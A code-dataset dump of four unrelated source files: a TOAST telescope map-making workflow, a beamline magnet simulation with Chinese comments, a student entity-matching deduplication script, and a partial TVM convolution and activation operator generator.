enabled=False\n ),\n toast.ops.GroundFilter(name=\"groundfilter\", enabled=False),\n toast.ops.PolyFilter(name=\"polyfilter1D\", enabled=False),\n toast.ops.PolyFilter2D(name=\"polyfilter2D\", enabled=False),\n toast.ops.CommonModeFilter(name=\"common_mode_filter\", enabled=False),\n toast.ops.Statistics(name=\"filtered_statistics\", enabled=False),\n toast.ops.BinMap(name=\"binner\", pixel_dist=\"pix_dist\"),\n toast.ops.MapMaker(name=\"mapmaker\"),\n toast.ops.PixelsHealpix(name=\"pixels_healpix_radec_final\", enabled=False),\n toast.ops.PixelsWCS(name=\"pixels_wcs_radec_final\", enabled=False),\n toast.ops.PixelsWCS(name=\"pixels_wcs_azel_final\", enabled=False),\n toast.ops.BinMap(\n name=\"binner_final\", enabled=False, pixel_dist=\"pix_dist_final\"\n ),\n toast.ops.FilterBin(name=\"filterbin\", enabled=False),\n so_ops.MLMapmaker(name=\"mlmapmaker\", enabled=False, comps=\"TQU\"),\n toast.ops.MemoryCounter(name=\"mem_count\", enabled=False),\n ]\n\n # Templates we want to configure from the command line or a parameter file.\n templates = [\n toast.templates.Offset(name=\"baselines\", enabled=False),\n # toast.templates.Fourier2D(name=\"fourier\", enabled=False),\n ]\n\n # Parse options\n config, args, jobargs = parse_config(operators, templates, comm)\n\n # Instantiate our operators and get the size of the process groups\n job, group_size, full_pointing = job_create(config, comm)\n\n # Create the toast communicator\n toast_comm = toast.Comm(world=comm, groupsize=group_size)\n\n # Load one or more observations\n data = load_data(job, args, toast_comm)\n\n # Reduce the data\n reduce_data(job, args, data)\n\n # Collect optional timing information\n alltimers = toast.timing.gather_timers(comm=toast_comm.comm_world)\n if toast_comm.world_rank == 0:\n out = os.path.join(args.out_dir, \"timing\")\n toast.timing.dump(alltimers, out)\n\n log.info_rank(\"Workflow completed in\", comm=comm, timer=timer0)\n\n\ndef cli():\n world, procs, rank = toast.mpi.get_world()\n with toast.mpi.exception_guard(comm=world):\n main()\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"sotodlib/toast/workflows/toast_so_map.py","file_name":"toast_so_map.py","file_ext":"py","file_size_in_byte":24187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334120892","text":"\"\"\"\n2021年5月24日\n\n矫正踢腿磁铁设计\n\n现在的情况是这样的:\n前偏转段优化后,不同动量分散下的相椭圆形状、Δx、Δy、Δxp都可以,唯独 Δxp 会变动,大约是 4mr/%\n现在打算加入矫正踢腿磁铁\n\n先看看没有动量分散下,全段情况\n\"\"\"\n\n# 因为要使用父目录的 cctpy 所以加入\nfrom os import error, path\nimport sys\nsys.path.append(path.dirname(path.abspath(path.dirname(__file__))))\nfrom work.A01run import *\nfrom cctpy import *\n\n\ndef beamline_phase_ellipse_multi_delta(bl: Beamline, particle_number: int,\n dps: List[float], describles: str = ['r-', 'y-', 'b-', 'k-', 'g-', 'c-', 'm-'],\n foot_step: float = 20*MM, report: bool = True):\n if len(dps) > len(describles):\n print(\n f'describles(size={len(describles)}) 长度应大于等于 dps(size={len(dps)})')\n xs = []\n ys = []\n for dp in dps:\n x, y = bl.track_phase_ellipse(\n x_sigma_mm=3.5, xp_sigma_mrad=7.5,\n y_sigma_mm=3.5, yp_sigma_mrad=7.5,\n delta=dp, particle_number=particle_number,\n kinetic_MeV=215, concurrency_level=16,\n footstep=foot_step,\n report=report\n )\n xs.append(x + [x[0]])\n ys.append(y + [y[0]])\n\n plt.subplot(121)\n\n for i in range(len(dps)):\n plt.plot(*P2.extract(xs[i]), describles[i])\n plt.xlabel(xlabel='x/mm')\n plt.ylabel(ylabel='xp/mr')\n plt.title(label='x-plane')\n plt.legend(['dp'+str(int(dp*1000)/10) for dp in dps])\n plt.axis(\"equal\")\n\n plt.subplot(122)\n for i in range(len(dps)):\n plt.plot(*P2.extract(ys[i]), describles[i])\n plt.xlabel(xlabel='y/mm')\n plt.ylabel(ylabel='yp/mr')\n plt.title(label='y-plane')\n plt.legend(['dp'+str(int(dp*1000)/10) for dp in dps])\n plt.axis(\"equal\")\n\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n BaseUtils.i_am_sure_my_code_closed_in_if_name_equal_main()\n\n param = [5.498,\t-3.124, \t30.539, \t0.383,\n 84.148, \t94.725,\t82.377,\n 100.672,\t72.283 \t, 99.973,\n -9807.602,\t9999.989 \t, 25.000,\t24.000\n ]\n\n qs1_g = param[0]\n qs2_g = param[1]\n\n qs1_s = param[2]\n qs2_s = param[3]\n\n dicct_tilt_1 = param[4]\n dicct_tilt_2 = param[5]\n dicct_tilt_3 = param[6]\n\n agcct_tilt_0 = param[7]\n agcct_tilt_2 = param[8]\n agcct_tilt_3 = param[9]\n\n dicct_current = param[10]\n agcct_current = param[11]\n\n agcct1_wn = int(param[12])\n agcct2_wn = int(param[13])\n\n\n qs1_gradient=qs1_g\n qs2_gradient=qs2_g\n qs1_second_gradient=qs1_s\n qs2_second_gradient=qs2_s\n\n qs1_aperture_radius=60*MM\n qs2_aperture_radius=60*MM\n\n dicct12_tilt_angles=[30, dicct_tilt_1, dicct_tilt_2, dicct_tilt_3]\n agcct12_tilt_angles=[agcct_tilt_0, 30, agcct_tilt_2, agcct_tilt_3]\n\n dicct12_current=dicct_current\n agcct12_current=agcct_current\n\n agcct1_winding_number=agcct1_wn\n agcct2_winding_number=agcct2_wn\n dicct12_winding_number=42\n\n\n agcct1_bending_angle=22.5 * (agcct1_wn / (agcct1_wn + agcct2_wn))\n agcct2_bending_angle=22.5 * (agcct2_wn / (agcct1_wn + agcct2_wn))\n\n DL1=0.9007765\n GAP1=0.4301517\n GAP2=0.370816\n qs1_length=0.2340128\n qs2_length=0.200139\n\n DL2=2.35011\n GAP3=0.43188\n qs3_length=0.24379\n qs3_aperture_radius=60 * MM\n qs3_gradient=-7.3733\n qs3_second_gradient=-45.31 * 2\n\n agcct12_inner_small_r=92.5 * MM - 20 * MM # 92.5\n agcct12_outer_small_r=108.5 * MM - 20 * MM # 83+15\n dicct12_inner_small_r=124.5 * MM - 20 * MM # 83+30+1\n dicct12_outer_small_r=140.5 * MM - 20 * MM # 83+45 +2\n\n dicct345_tilt_angles=[30, 88.773,\t98.139, 91.748]\n agcct345_tilt_angles=[101.792, 30, 62.677,\t89.705]\n dicct345_current=9409.261\n agcct345_current=-7107.359\n agcct3_winding_number=25\n agcct4_winding_number=40\n agcct5_winding_number=34\n agcct3_bending_angle=-67.5 * (25 / (25 + 40 + 34))\n agcct4_bending_angle=-67.5 * (40 / (25 + 40 + 34))\n agcct5_bending_angle=-67.5 * (34 / (25 + 40 + 34))\n\n agcct345_inner_small_r=92.5 * MM + 0.1*MM # 92.5\n agcct345_outer_small_r=108.5 * MM + 0.1*MM # 83+15\n dicct345_inner_small_r=124.5 * MM + 0.1*MM # 83+30+1\n dicct345_outer_small_r=140.5 * MM + 0.1*MM # 83+45 +2\n\n dicct345_winding_number=128\n part_per_winding=120\n\n\n deltas = BaseUtils.list_multiply([-4,-2,0,2,4],0.01)\n fields = [0,-0.05,-0.05,-0.1,-0.07]\n cs = ['r-', 'y-', 'b-', 'k-', 'g-', 'c-', 'm-']\n\n for i in range(len(fields)):\n straight_dipole_magnet_filed = fields[i]\n bl = Beamline = (\n Beamline.set_start_point(P2.origin()) # 设置束线的起点\n # 设置束线中第一个漂移段(束线必须以漂移段开始)\n .first_drift(direct=P2.x_direct(), length=DL1)\n .append_agcct( # 尾接 acgcct\n big_r=0.95, # 偏转半径\n # 二极 CCT 和四极 CCT 孔径\n small_rs=[dicct12_outer_small_r, dicct12_inner_small_r,\n agcct12_outer_small_r, agcct12_inner_small_r],\n bending_angles=[agcct1_bending_angle,\n agcct2_bending_angle], # agcct 每段偏转角度\n tilt_angles=[dicct12_tilt_angles,\n agcct12_tilt_angles], # 二极 CCT 和四极 CCT 倾斜角\n winding_numbers=[[dicct12_winding_number], [\n agcct1_winding_number, agcct2_winding_number]], # 二极 CCT 和四极 CCT 匝数\n # 二极 CCT 和四极 CCT 电流\n currents=[dicct12_current, agcct12_current],\n disperse_number_per_winding=part_per_winding # 每匝分段数目\n )\n .append_drift(GAP1) # 尾接漂移段\n .append_qs( # 尾接 QS 磁铁\n length=qs1_length,\n gradient=qs1_gradient,\n second_gradient=qs1_second_gradient,\n aperture_radius=qs1_aperture_radius\n )\n .append_drift(GAP2)\n .append_qs(\n length=qs2_length,\n gradient=qs2_gradient,\n second_gradient=qs2_second_gradient,\n aperture_radius=qs2_aperture_radius\n )\n .append_drift(GAP2)\n .append_qs(\n length=qs1_length,\n gradient=qs1_gradient,\n second_gradient=qs1_second_gradient,\n aperture_radius=qs1_aperture_radius\n )\n .append_drift(GAP1)\n .append_agcct(\n big_r=0.95,\n small_rs=[dicct12_outer_small_r, dicct12_inner_small_r,\n agcct12_outer_small_r, agcct12_inner_small_r],\n bending_angles=[agcct2_bending_angle,\n agcct1_bending_angle],\n tilt_angles=[dicct12_tilt_angles,\n agcct12_tilt_angles],\n winding_numbers=[[dicct12_winding_number], [\n agcct2_winding_number, agcct1_winding_number]],\n currents=[dicct12_current, agcct12_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(DL1-0.1)\n .append_straight_dipole_magnet(\n magnetic_field=straight_dipole_magnet_filed,\n length=0.2,\n aperture_radius=60*MM\n )\n # 第二段\n .append_drift(DL2-0.1)\n .append_agcct(\n big_r=0.95,\n small_rs=[dicct345_outer_small_r, dicct345_inner_small_r,\n agcct345_outer_small_r, agcct345_inner_small_r],\n bending_angles=[agcct3_bending_angle,\n agcct4_bending_angle, agcct5_bending_angle],\n tilt_angles=[dicct345_tilt_angles,\n agcct345_tilt_angles],\n winding_numbers=[[dicct345_winding_number], [\n agcct3_winding_number, agcct4_winding_number, agcct5_winding_number]],\n currents=[dicct345_current, agcct345_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(GAP3)\n .append_qs(\n length=qs3_length,\n gradient=qs3_gradient,\n second_gradient=qs3_second_gradient,\n aperture_radius=qs3_aperture_radius\n )\n .append_drift(GAP3)\n .append_agcct(\n big_r=0.95,\n small_rs=[dicct345_outer_small_r, dicct345_inner_small_r,\n agcct345_outer_small_r, agcct345_inner_small_r],\n bending_angles=[agcct5_bending_angle,\n agcct4_bending_angle, agcct3_bending_angle],\n tilt_angles=[dicct345_tilt_angles,\n agcct345_tilt_angles],\n winding_numbers=[[dicct345_winding_number], [\n agcct5_winding_number, agcct4_winding_number, agcct3_winding_number]],\n currents=[dicct345_current, agcct345_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(DL2)\n )\n \n xs,ys = bl.track_phase_ellipse(\n x_sigma_mm=3.5,xp_sigma_mrad=7.5,\n y_sigma_mm=3.5,yp_sigma_mrad=7.5,\n delta=deltas[i],\n particle_number=8,\n kinetic_MeV=215,\n concurrency_level=16,\n footstep=20*MM\n )\n\n Plot2.plot_p2s(xs,describe=cs[i],circle=True)\n \n Plot2.equal()\n Plot2.legend(*[str(int(deltas[i]*100))+\"%:\"+str(fields[i])+\"T\" for i in range(len(fields))])\n Plot2.info(\"x/mm\",\"y/mm\",\"\")\n Plot2.show()\n\n","sub_path":"final_code/work/recycle_bin/B04矫正踢腿磁场和能散匹配.py","file_name":"B04矫正踢腿磁场和能散匹配.py","file_ext":"py","file_size_in_byte":10265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314524935","text":"'''\nDate: 25 June 2018\nPurpose: Dedup files based on entity matching api\nData Integration Assignment 3\n\nSUBMISSION BY: GROUP B\n NAME: Abhishek Shrestha (Matr. Nummer: 390055)\n Jia Jia (Matr. Nummer: 389917)\n Syed Salman Ali (Matr. Nummer: 395898)\n\n\n https://gitlab.tu-berlin.de/mandir123/DataIntegration\n \nFor the given dataset, \n TASK 2. Use partioning/ blocking for duplicate detection.\n\n\n'''\n\nimport csv\nimport py_entitymatching as em\nimport pandas as pd\nimport datetime\n\n'''\n Ref. from: https://nbviewer.jupyter.org/github/anhaidgroup/py_entitymatching/blob/rel_0.1.x/notebooks/guides/step_wise_em_guides/Down%20Sampling.ipynb\n The code is ported to python but the logic of downsampling is originally from the above source :)\n'''\n\n\n\ncsv_source = 'D:\\TU\\_SEM 3\\800-6\\Data Integration\\DataIntegration\\Assignments\\Assignment 3\\Source\\inputDB.csv'\n\n#Read the source csv\nStartTime = datetime.datetime.now()\nprint('Started at: '+ str(StartTime))\nSource_1 = em.read_csv_metadata(csv_source, low_memory=False) # setting the parameter low_memory to False to speed up loading.\nLen_Source_1 = len(Source_1)\nprint('Number of records on source Sample: %d' % Len_Source_1)\n\nSource_2 = em.read_csv_metadata(csv_source, low_memory=False) # setting the parameter low_memory to False to speed up loading. \nLen_Source_1 = len(Source_2)\n\n#Set key\nem.set_key(Source_1, 'RecID')\nem.set_key(Source_2, 'RecID')\n\n#Start Downsampling\nSample_1, Sample_2 = em.down_sample(Source_1, Source_2, size=10000, y_param=1, show_progress=True)\nprint('Downsampling is complete...')\nprint('Number of records on source Sample: %d' % len(Sample_1))\nprint(len(Sample_1))\nprint('______________________')\nprint('Sample Head...')\nprint(Sample_1.head())\nprint('______________________')\nprint('Sample Properties are: ')\nem.show_properties(Sample_1)\nem.show_properties(Sample_2)\n\n#Blocking using an attribute blocker\nat_blocker = em.AttrEquivalenceBlocker()\nA_block = at_blocker.block_tables(Sample_1, Sample_2, \n l_block_attr = 'SSN', r_block_attr = 'SSN', \n l_output_attrs= ['SSN'], r_output_attrs= ['SSN'], \n l_output_prefix ='L_', r_output_prefix='R_')\n \nprint('______________________')\nprint('After Blocking...')\nprint(A_block.head())\nB_block = A_block[A_block.L_RecID != A_block.R_RecID]\n\n#write to outpupt file\nwith open(\"D:\\\\output.csv\", 'w') as File: \n for index, row in B_block.iterrows():\n File.write(str(row['L_RecID'] + \", \" + row['R_RecID'] + \"\\n\"))\nEndTime = datetime.datetime.now()\nprint('Ended at:'+ str(EndTime))\nduration_seconds = (EndTime - StartTime).total_seconds()\nduration_in_minutes = divmod(duration_seconds, 60)[0] \nprint('Total time taken: ' + str(duration_in_minutes))\n ","sub_path":"Submission/Source/Task 2/Source/EntityMatching_dem.py","file_name":"EntityMatching_dem.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"605344778","text":"# Copyright 2019 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nThis module is rule to generation tvm operate, call by at_gen_strip.py\n\"\"\"\nimport numpy as np\nimport tvm\nimport topi\nfrom topi.image import resize\nfrom topi.nn import mirror_pad\nfrom topi import tag\nimport topi.testing\n\nfrom arm_cpu.deconv import _conv_spatial_pack_deconv, schedule_conv2d_nchw_arm_cpu_deconv\nfrom arm_cpu.conv2d import _conv_spatial_pack_asm, schedule_conv2d_nchw_arm_cpu\nfrom arm_cpu.matmul import _matmul_spatial_pack_asm, _matmul_schedule_asm\nfrom arm_cpu.depthwise_conv2d import _depthwise_spatial_pack, schedule_depthwise_conv2d_nchw_arm\nfrom config_tool import activation_enum_map\n\nmap_conv = {\n 'Convolution': \"Conv2D\",\n 'ConvolutionDepthwise': \"DepthwiseConv2D\",\n 'Deconvolution': \"DeConv2D\",\n 'DeConvolutionDepthwise': \"DeDepthwiseConv2D\",\n}\n\n\ndef Genlib(sch, tensor_list, device, opname, lib_path, print_lower=False):\n if print_lower:\n print(tvm.lower(sch, tensor_list, simple_mode=True))\n ctx = tvm.context(device, 0)\n func_o = tvm.build(sch, tensor_list, device + \" --system-lib\", name=opname)\n func_so = tvm.build(sch, tensor_list, device, name=opname)\n func_o.save(lib_path + opname + \".o\", \"o\")\n return func_o, func_so, ctx\n\n\ndef AsType(as_input, dtype):\n if as_input.dtype == dtype:\n return as_input\n return tvm.compute(as_input.shape,\n lambda *i: as_input(*i).astype(dtype),\n tag=\"injective\")\n\n\n@tvm.tag_scope(tag=tag.ELEMWISE)\ndef TopiNNrelu6(x):\n return tvm.compute(x.shape, lambda *i: tvm.min(tvm.max(x(*i), tvm.const(0, x.dtype)), tvm.const(6, x.dtype)))\n\n\ndef TopiActivation(in_tensor, a_type, memcpy=False):\n '''\n activativation\n Args:\n in_tensor:\n a_type:\n memcpy:\n\n Returns:\n '''\n if a_type == 'NO_ACTIVATION':\n if memcpy:\n return tvm.compute(in_tensor.shape, lambda *i: in_tensor[i], tag=tag.ELEMWISE)\n return in_tensor\n if a_type == 'RELU':\n return topi.nn.relu(in_tensor)\n if a_type == 'RELU6':\n return TopiNNrelu6(in_tensor)\n if a_type == 'SIGMOID':\n if in_tensor.dtype in [\"uint8\", \"int8\", \"uint32\", \"int32\"]:\n a_fp32 = AsType(in_tensor, 'float32')\n out_tensor = topi.sigmoid(a_fp32)\n return AsType(out_tensor, in_tensor.dtype)\n return topi.sigmoid(in_tensor)\n raise ValueError(\"not support activation type\" + a_type)\n\n\ndef Deconv(device=\"llvm\", lib_path=\"./\", optype=None,\n ndim=None, dtype=None, kernels=None,\n strides=None, pad=None, dilations=None,\n hasbias=None, activation_type=None,\n config_entity=None, impl_dtype=None,\n use_arm32=False, cfg=None):\n '''\n Deconvolution\n Args:\n device:\n lib_path:\n optype:\n ndim:\n dtype:\n kernels:\n strides:\n pad:\n dilations:\n hasbias:\n activationType:\n configEntity:\n impl_dtype:\n use_arm32:\n cfg:\n\n Returns:\n '''\n if cfg is None:\n cfg = {'CI': tvm.var('ci'), 'VH': 2, 'VW': 2, 'VC': 4, 'VI': 4,\n 'tile_oh': 2, 'tile_ow': 2, 'tile_co': 4,\n 'ann_reduce': ['none', 'none'],\n \"ann_spatial\": ['none', 'none', 'none']\n }\n has_bias = hasbias\n batch = tvm.var(\"batch\")\n in_channel = tvm.var(\"in_channel\")\n in_height, in_width = tvm.var(\"in_height\"), tvm.var(\"in_width\")\n kh, kw = kernels\n ow = cfg['VW']\n oh = cfg['VH']\n oc = cfg['VC']\n op_name = \"%s_ndim%d_%s_k%d_s%d_p%d%d%d%d_d%d_act%d_vc%d_vh%d_vw%d_hasbias%d\" % (\\\n map_conv[optype], ndim, dtype,\\\n kh, strides[0], pad[0], pad[1], pad[2], pad[3], dilations[0],\\\n activation_enum_map[activation_type], oc, oh, ow, hasbias)\n opname = op_name\n print(\"DEconv\", opname, config_entity)\n\n if impl_dtype is None:\n impl_dtype = dtype\n\n out_channel = tvm.var(\"out_channel\")\n\n # define placeholder\n input_tensor = in_tensor = tvm.placeholder((batch, in_channel, in_height, in_width, 4), \\\n dtype=dtype, name='in_tensor')\n temp_tensor = kernel_tensor = tvm.placeholder((in_channel*4, out_channel, kh, kw), dtype=dtype, \\\n name='kernel_tensor')\n if has_bias:\n bias = tvm.placeholder((out_channel,), dtype=dtype, name='bias')\n bias1 = topi.reshape(bias, (out_channel, 1, 1))\n\n if impl_dtype != dtype:\n input_tensor = AsType(input_tensor, impl_dtype)\n temp_tensor = AsType(temp_tensor, impl_dtype)\n if has_bias:\n bias1 = AsType(bias1, impl_dtype)\n\n # define compute & schedule\n cfg1 = (True, 1, 1, 1) if cfg is None else (True, cfg[\"tile_oh\"], cfg[\"tile_ow\"], cfg[\"tile_co\"])\n out_tensor = _conv_spatial_pack_deconv(cfg1, input_tensor, temp_tensor, out_dtype=impl_dtype)\n\n if has_bias:\n out_tensor = tvm.compute(out_tensor.shape, lambda n, co, h, w, c4: \\\n out_tensor[n, co, h, w, c4] + bias1[co*4 + c4][0][0], tag=\"injective\")\n out_tensor = TopiActivation(out_tensor, activation_type)\n if impl_dtype != dtype:\n out_tensor = AsType(out_tensor, dtype)\n\n # create schedule\n if use_arm32:\n s = tvm.create_schedule(out_tensor.op)\n else:\n s = schedule_conv2d_nchw_arm_cpu_deconv(cfg, [out_tensor])\n\n attr = [batch, in_channel, in_height, in_width, out_channel, in_tensor, kernel_tensor]\n if has_bias: attr.append(bias)\n attr.append(out_tensor)\n tensor_list = attr\n\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef ConvVar(device=\"llvm\", lib_path=\"./\", optype=None,\\\n ndim=None, layout=None, dtype=None, kernels=None,\\\n strides=None, pad=None, dilations=None,\\\n hasbias=None, activation_type=None,\\\n config_entity=None, impl_dtype=None, channel_multiplier=None,\\\n use_arm32=False, cfg=None):\n '''\n convolution\n Args:\n device:\n lib_path:\n optype:\n ndim:\n layout:\n dtype:\n kernels:\n strides:\n pad:\n dilations:\n hasbias:\n activationType:\n configEntity:\n impl_dtype:\n channel_multiplier:\n use_arm32:\n cfg:\n\n Returns:\n '''\n use_depthwise = optype == 'ConvolutionDepthwise'\n use_deconv = optype == 'Deconvolution'\n use_deconv_depthwise = optype == 'DeConvolutionDepthwise'\n has_bias = hasbias\n\n ow = 1 if cfg is None else cfg['VW']\n oh = 1 if cfg is None else cfg['VH']\n oc = 1 if cfg is None else cfg['VC']\n kh, kw = kernels\n op_name = \"%s_ndim%d_%s_k%d_s%d_p%d%d%d%d_d%d_act%d_vc%d_vh%d_vw%d_hasbias%d\" % ( \\\n map_conv[optype], ndim, dtype, \\\n kh, strides[0], pad[0], pad[1], pad[2], pad[3], dilations[0], \\\n activation_enum_map[activation_type], oc, oh, ow, hasbias)\n batch = tvm.var(\"batch\")\n in_channel = tvm.var(\"in_channel\")\n in_height, in_width = tvm.var(\"in_height\"), tvm.var(\"in_width\")\n pad_up, pad_down, pad_left, pad_right = pad\n opname = op_name\n\n print(\"Conv\", opname, config_entity)\n\n if impl_dtype is None:\n impl_dtype = dtype\n\n if use_depthwise:\n multiplier = channel_multiplier\n out_channel = in_channel * multiplier\n elif use_deconv_depthwise:\n multiplier = channel_multiplier\n out_channel = in_channel * multiplier\n else:\n out_channel = tvm.var(\"out_channel\")\n\n # define placeholder\n input_tensor = in_tensor = tvm.placeholder((batch, in_channel, in_height, in_width), dtype=dtype, name='in_tensor')\n\n if use_depthwise:\n temp_tensor = kernel_tensor = tvm.placeholder((in_channel, multiplier, kh, kw), dtype=dtype,\\\n name='kernel_tensor')\n elif use_deconv:\n temp_tensor = kernel_tensor = tvm.placeholder((in_channel, out_channel, kh, kw), dtype=dtype,\\\n name='kernel_tensor')\n elif use_deconv_depthwise:\n temp_tensor = kernel_tensor = tvm.placeholder((in_channel, multiplier, kh, kw), dtype=dtype,\\\n name='kernel_tensor')\n else:\n temp_tensor = kernel_tensor = tvm.placeholder((out_channel, in_channel, kh, kw), dtype=dtype,\\\n name='kernel_tensor')\n if has_bias:\n bias = tvm.placeholder((out_channel,), dtype=dtype, name='bias')\n bias1 = topi.reshape(bias, (out_channel, 1, 1))\n\n if impl_dtype != dtype:\n input_tensor = AsType(input_tensor, impl_dtype)\n temp_tensor = AsType(temp_tensor, impl_dtype)\n if has_bias:\n bias1 = AsType(bias1, impl_dtype)\n\n # define compute & schedule\n if pad_up != pad_down or pad_left != pad_right:\n input_tensor = topi.nn.pad(input_tensor, [0, 0, pad_up, pad_left], [0, 0, pad_down, pad_right], name='data_pad')\n padding = 0, 0\n else:\n padding = pad_up, pad_left\n if use_depthwise:\n cfg1 = (True, 1, 1, 1) if cfg is None else (True, cfg[\"tile_oh\"], cfg[\"tile_ow\"], cfg[\"tile_co\"])\n out_tensor = _depthwise_spatial_pack(cfg1, input_tensor, temp_tensor, strides, padding, dilations,\\\n out_dtype=impl_dtype)\n elif use_deconv:\n\n def GetInput(input_tensor, temp_tensor, padding):\n _, out_c, filter_h, filter_w = temp_tensor.shape\n if out_c is None:\n print(\"temp_tensor.shape err\")\n stride_h, stride_w = strides\n # dilate stage\n dilated_input = topi.nn.dilate(input_tensor, [1, 1, stride_h, stride_w],\n name='DilatedInput')\n # padding stage\n fpad_top, fpad_left, fpad_bottom, fpad_right = topi.nn.get_pad_tuple(padding, (\n filter_h, filter_w))\n bpad_top = filter_h - 1 - fpad_top\n bpad_bottom = filter_h - 1 - fpad_bottom\n bpad_left = filter_w - 1 - fpad_left\n bpad_right = filter_w - 1 - fpad_right\n padded_input = topi.nn.pad(dilated_input, \\\n [0, 0, bpad_top, bpad_left], \\\n [0, 0, bpad_bottom, bpad_right], \\\n name='PaddedInput')\n return padded_input\n\n special_deconv = kh == 2 and kw == 2 and strides[0] == 2 and strides[1] == 2\n # special_deconv = False\n if special_deconv:\n out_tensor = OptimalOut(input_tensor, temp_tensor, in_channel)\n else:\n out_tensor = BaseImplementation(input_tensor, temp_tensor, GetInput, layout, padding)\n elif use_deconv_depthwise:\n def GetInput(input_tensor, temp_tensor, padding):\n _, out_c, filter_h, filter_w = temp_tensor.shape\n if out_c is None:\n print(\"temp_tensor.shape err\")\n stride_h, stride_w = strides\n # dilate stage\n dilated_input = topi.nn.dilate(input_tensor, [1, 1, stride_h, stride_w],\n name='DilatedInput')\n # padding stage\n fpad_top, fpad_left, fpad_bottom, fpad_right = topi.nn.get_pad_tuple(padding, (\n filter_h, filter_w))\n bpad_top = filter_h - 1 - fpad_top\n bpad_bottom = filter_h - 1 - fpad_bottom\n bpad_left = filter_w - 1 - fpad_left\n bpad_right = filter_w - 1 - fpad_right\n padded_input = topi.nn.pad(dilated_input, \\\n [0, 0, bpad_top, bpad_left], \\\n [0, 0, bpad_bottom, bpad_right], \\\n name='PaddedInput')\n return padded_input\n\n temp_tensor = topi.flip(temp_tensor, axis=-1)\n temp_tensor = topi.flip(temp_tensor, axis=-2)\n out_tensor = topi.nn.depthwise_conv2d_nchw(GetInput(input_tensor, temp_tensor, padding), temp_tensor, (1, 1), \\\n padding, (1, 1), out_dtype=input_tensor.dtype)\n else:\n cfg1 = (True, 1, 1, 1) if cfg is None else (True, cfg[\"tile_oh\"], cfg[\"tile_ow\"], cfg[\"tile_co\"])\n out_tensor = _conv_spatial_pack_asm(cfg1, input_tensor, temp_tensor, strides, padding, dilations,\\\n out_dtype=impl_dtype)\n\n if has_bias:\n out_tensor = tvm.compute(out_tensor.shape, lambda n, co, h, w: out_tensor[n, co, h, w] + bias1[co][0][0],\\\n tag=\"injective\")\n out_tensor = TopiActivation(out_tensor, activation_type)\n if impl_dtype != dtype:\n out_tensor = AsType(out_tensor, dtype)\n\n # create schedule\n if use_arm32:\n s = tvm.create_schedule(out_tensor.op)\n elif use_depthwise:\n s = schedule_depthwise_conv2d_nchw_arm(cfg, [out_tensor])\n elif use_deconv:\n if special_deconv:\n s = tvm.create_schedule([out_tensor.op])\n else:\n s = topi.generic.schedule_conv2d_nchw([out_tensor])\n elif use_deconv_depthwise:\n s = tvm.create_schedule([out_tensor.op])\n else:\n s = schedule_conv2d_nchw_arm_cpu([out_tensor])\n\n # generate lib\n attr = [batch, in_channel, in_height, in_width, out_channel, in_tensor, kernel_tensor]\n tensor_list = [*attr, bias, out_tensor] if has_bias else [*attr, out_tensor]\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef BaseImplementation(input_tensor, temp_tensor, get_input, layout, padding):\n temp_tensor = topi.flip(temp_tensor, axis=-1)\n temp_tensor = topi.flip(temp_tensor, axis=-2)\n temp_tensor = topi.transpose(temp_tensor, axes=(1, 0, 2, 3))\n out_tensor = topi.nn.conv2d(get_input(input_tensor, temp_tensor, padding), temp_tensor, (1, 1), padding, (1, 1),\n layout=layout, out_dtype=input_tensor.dtype)\n return out_tensor\n\n\ndef OptimalOut(input_tensor, temp_tensor, in_channel):\n '''\n deconv compute\n Args:\n input_tensor:\n temp_tensor:\n in_channel:\n\n Returns:\n '''\n temp_tensor = topi.transpose(temp_tensor, axes=(1, 0, 2, 3))\n out_shape = []\n for i in range(len(input_tensor.shape)):\n if i == 0:\n out_shape.append(input_tensor.shape[i])\n continue\n if i == 1:\n out_shape.append(temp_tensor.shape[0])\n continue\n out_shape.append(2 * input_tensor.shape[i])\n rc = tvm.reduce_axis((0, in_channel), name='rc')\n return tvm.compute(out_shape, lambda i, j, k, l:\\\n tvm.sum(input_tensor[i, rc, k // 2, l // 2].astype(input_tensor.dtype) *\\\n temp_tensor[j, rc, k % 2, l % 2].astype(input_tensor.dtype), axis=[rc]))\n\n\ndef Concat(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, input_num=None, axis=None):\n '''\n concat\n Args:\n device:\n lib_path:\n all_tensors:\n ndim:\n dtype:\n input_num:\n axis:\n\n Returns:\n '''\n if axis >= ndim:\n return\n shapes = []\n for i in range(input_num):\n shape = []\n for j in range(ndim):\n if j == axis:\n shape.append(tvm.var(\"axis\" + str(i)))\n else:\n shape.append(tvm.var(\"n\" + str(j)))\n shapes.append(shape)\n in_tensor = [tvm.placeholder(shape, dtype=dtype, name='in_tensor%d' % i) for i, shape in enumerate(shapes)]\n opname = \"Concat_ndim%d_%s_input_num%d_axis%d\" % (ndim, dtype, input_num, axis)\n print(opname)\n\n # define compute\n out_tensor = topi.concatenate(tuple(in_tensor), axis)\n tensor_list = in_tensor + [out_tensor]\n if ndim < 5:\n s = topi.generic.schedule_concatenate(out_tensor)\n else:\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Activation(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, optype=None):\n '''\n activation\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n optype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = 